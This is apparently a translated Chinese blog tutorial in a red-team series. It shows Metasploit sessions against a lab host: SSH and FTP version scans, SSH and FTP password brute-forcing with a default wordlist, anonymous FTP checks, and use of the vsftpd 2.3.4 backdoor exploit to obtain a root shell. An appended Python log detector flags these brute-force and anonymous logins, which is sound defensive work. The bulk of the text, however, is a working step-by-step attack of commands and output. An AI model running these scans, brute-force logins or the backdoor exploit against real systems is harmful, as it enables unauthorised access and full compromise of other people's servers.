
Red Team / White Hat Essentials (16): Using Metasploit for Flank Reconnaissance and Brute-Force Logins [Since we're red team, go hard on yourself!!!]

Author: 盛透侧视攻城狮
Published 2024-12-25 01:11:39

1. Gathering information over the SSH protocol

Check the SSH service version

┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# msfconsole 
Metasploit tip: Tired of setting RHOSTS for modules? Try globally setting it 
with setg RHOSTS x.x.x.x
                                                  
IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v6.3.55-dev                          ]
+ -- --=[ 2397 exploits - 1232 auxiliary - 422 post       ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > show options                                           
                                                                                                 
Module options (auxiliary/scanner/ssh/ssh_version):                                              
                                                                                                 
   Name     Current Setting  Required  Description                                               
   ----     ---------------  --------  -----------                                               
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs  
                                       /using-metasploit/basics/using-metasploit.html            
   RPORT    22               yes       The target port (TCP)                                     
   THREADS  1                yes       The number of concurrent threads (max one per host)
   TIMEOUT  30               yes       Timeout for the SSH probe


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 auxiliary(scanner/ssh/ssh_version) > run

SSH brute force

msf6 auxiliary(scanner/ssh/ssh_version) > back
msf6 >  use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) >  show options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   ANONYMOUS_LOGIN   false            yes       Attempt to login with a blank username and pass
                                                word
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the cur
                                                rent database
   DB_ALL_PASS       false            no        Add all passwords in the current database to th
                                                e list
   DB_ALL_USERS      false            no        Add all users in the current database to the li
                                                st
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current
                                                 database (Accepted: none, user, user&realm)
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target host(s), see https://docs.metasploit
                                                .com/docs/using-metasploit/basics/using-metaspl
                                                oit.html
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a hos
                                                t
   THREADS           1                yes       The number of concurrent threads (max one per h
                                                ost)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated b
                                                y space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           false            yes       Whether to print output for all attempts


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt                                                                        
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt  
  • The dictionary file does not contain our user's credentials, so we add our own username/password pair to it by hand in order to demonstrate the effect. Open a new terminal window for this.
  • Set the dictionary file: the default dictionary does not meet real-world needs; later we will use more powerful dictionaries.
  • Note: first append the user/password line shown below to the file, then run the module again.
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# echo "msfadmin msfadmin" >> /usr/share/metasploit-framework/data/wordlists/root_userpass.txt

Back in the MSF console

msf6 auxiliary(scanner/ssh/ssh_login) > run

2. Gathering information over the FTP protocol

2.1 Check the FTP service version

Load the FTP version scanner module
msf6 auxiliary(scanner/ssh/ssh_login) > back
msf6 > use auxiliary/scanner/ftp/ftp_version
View the configurable options
msf6 auxiliary(scanner/ftp/ftp_version) > show options

Module options (auxiliary/scanner/ftp/ftp_version):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/
                                           docs/using-metasploit/basics/using-metasploit.html
   RPORT    21                   yes       The target port (TCP)
   THREADS  1                    yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.
Set the target IP (several targets can be set at once)
msf6 auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.1.180
Run the scan: enter exploit or run
msf6 auxiliary(scanner/ftp/ftp_version) > run

  • We can see that the scan result is: vsFTPd 2.3.4
Exit the module
msf6 auxiliary(scanner/ftp/ftp_version) > back
msf6 > 
With the FTP service version identified, we can search for that version number to see whether an exploitable module exists [or search for vsftpd]
msf6 >  search 2.3.4

Matching Modules
================

   #  Name                                                      Disclosure Date  Rank       Check  Description
   -  ----                                                      ---------------  ----       -----  -----------
   0  exploit/multi/http/struts2_namespace_ognl                 2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection
   1  auxiliary/gather/teamtalk_creds                                            normal     No     TeamTalk Gather Credentials
   2  exploit/unix/ftp/vsftpd_234_backdoor                      2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution
   3  exploit/unix/http/zivif_ipcheck_exec                      2017-09-01       excellent  Yes    Zivif Camera iptest.cgi Blind Remote Command Execution
   4  exploit/multi/http/oscommerce_installer_unauth_code_exec  2018-04-30       excellent  Yes    osCommerce Installer Unauthenticated Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/oscommerce_installer_unauth_code_exec                                                                

msf6 > search vsftpd

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  auxiliary/dos/ftp/vsftpd_232          2011-02-03       normal     Yes    VSFTPD 2.3.2 Denial of Service
   1  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 1, use 1 or use exploit/unix/ftp/vsftpd_234_backdoor                                                                                    

msf6 > 
  • There is an exploit module, and this version of the FTP service contains a backdoor
So let's try that module
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][
                                       ...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs
                                       /using-metasploit/basics/using-metasploit.html
   RPORT    21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
We obtained a shell, and it runs as root, so let's try a few commands:
Run id to see the current user
Run ifconfig to see the IP address

2.2 FTP anonymous login scan [just grind through it]

  • It is really just a matter of using the vulnerability module
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > back
msf6 > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(scanner/ftp/anonymous) > show options

Module options (auxiliary/scanner/ftp/anonymous):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/
                                           docs/using-metasploit/basics/using-metasploit.html
   RPORT    21                   yes       The target port (TCP)
   THREADS  1                    yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 auxiliary(scanner/ftp/anonymous) > run

2.3 FTP brute force

The only step that differs from the SSH brute force: the FTP vulnerability module that is used
msf6 auxiliary(scanner/ftp/anonymous) > back
msf6 >  use auxiliary/scanner/ftp/ftp_login
msf6 auxiliary(scanner/ftp/ftp_login) > show options

Module options (auxiliary/scanner/ftp/ftp_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   ANONYMOUS_LOGIN   false            yes       Attempt to login with a blank username and pass
                                                word
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the cur
                                                rent database
   DB_ALL_PASS       false            no        Add all passwords in the current database to th
                                                e list
   DB_ALL_USERS      false            no        Add all users in the current database to the li
                                                st
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current
                                                 database (Accepted: none, user, user&realm)
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:ho
                                                st:port][...]
   RECORD_GUEST      false            no        Record anonymous/guest logins to the database
   RHOSTS                             yes       The target host(s), see https://docs.metasploit
                                                .com/docs/using-metasploit/basics/using-metaspl
                                                oit.html
   RPORT             21               yes       The target port (TCP)
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a hos
                                                t
   THREADS           1                yes       The number of concurrent threads (max one per h
                                                ost)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated b
                                                y space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.1.180
RHOSTS => 192.168.1.180
msf6 auxiliary(scanner/ftp/ftp_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
Finally, just run it.
This article is part of the Tencent Cloud self-media sync exposure program and is shared from the author's personal site/blog.
Originally published 2024-12-25.
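As an added example (not from the original post), here is the target's view of the SSH and FTP brute-force runs above and of the anonymous FTP check in 2.2: a Python detector over constructed sshd auth.log and vsftpd.log lines that flags a burst of failed logins from one client, a success that follows earlier failures from the same client (which is what a hit from root_userpass.txt looks like in the log), and any accepted anonymous FTP login. The log lines, hostnames and the 3-failure threshold are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample (not from the original post): an sshd auth.log excerpt and a vsftpd.log
# excerpt as they would look while ssh_login / ftp_login iterate through a USERPASS_FILE.
SAMPLE_LOG = """\
Dec 25 01:11:39 target sshd[2201]: Failed password for root from 192.168.1.5 port 40001 ssh2
Dec 25 01:11:39 target sshd[2202]: Failed password for invalid user admin from 192.168.1.5 port 40002 ssh2
Dec 25 01:11:40 target sshd[2203]: Failed password for root from 192.168.1.5 port 40003 ssh2
Dec 25 01:11:40 target sshd[2204]: Accepted password for msfadmin from 192.168.1.5 port 40004 ssh2
Dec 25 01:12:01 target sshd[2210]: Accepted publickey for alice from 192.168.1.20 port 51000 ssh2
Wed Dec 25 01:13:02 2024 [pid 3101] [anonymous] OK LOGIN: Client "192.168.1.5"
Wed Dec 25 01:13:05 2024 [pid 3102] [root] FAIL LOGIN: Client "192.168.1.5"
Wed Dec 25 01:13:05 2024 [pid 3103] [ftp] FAIL LOGIN: Client "192.168.1.5"
Wed Dec 25 01:13:06 2024 [pid 3104] [msfadmin] OK LOGIN: Client "192.168.1.5"
"""

# sshd: "Failed password for [invalid user ]<user> from <ip> port ..." / "Accepted <method> for <user> from <ip> port ..."
SSHD_RE = re.compile(r"sshd\[\d+\]: (?P<res>Failed|Accepted) \w+ for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port")
# vsftpd: "[<user>] OK LOGIN: Client "<ip>"" / "[<user>] FAIL LOGIN: Client "<ip>""
VSFTPD_RE = re.compile(r'\[(?P<user>[^\]]+)\] (?P<res>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')

def parse_events(text):
    """Yield (service, source_ip, username, success) for every login attempt in the log text."""
    for line in text.splitlines():
        if (m := SSHD_RE.search(line)):
            yield ("ssh", m["ip"], m["user"], m["res"] == "Accepted")
        elif (m := VSFTPD_RE.search(line)):
            yield ("ftp", m["ip"], m["user"], m["res"] == "OK")

def detect(text, fail_threshold=3):
    """Return findings as (service, source_ip, message) tuples, in log order."""
    fails = defaultdict(int)           # (service, ip) -> failed logins so far
    users_tried = defaultdict(set)     # (service, ip) -> distinct usernames that failed
    findings = []
    for service, ip, user, ok in parse_events(text):
        key = (service, ip)
        if ok:
            if service == "ftp" and user == "anonymous":
                findings.append((*key, "anonymous FTP login permitted"))
            if fails[key]:   # a hit after guessing: the signature of a USERPASS_FILE run
                findings.append((*key, f"success for {user!r} after {fails[key]} failures"))
        else:
            fails[key] += 1
            users_tried[key].add(user)
            if fails[key] == fail_threshold:   # fire once per client when the burst crosses the line
                findings.append((*key, f"{fail_threshold} failures, {len(users_tried[key])} usernames tried"))
    return findings
```

Note that the FTP run in the sample never reaches the failure threshold, yet the success after two failures is still reported; the "success after failures" rule is what catches a short dictionary like root_userpass.txt.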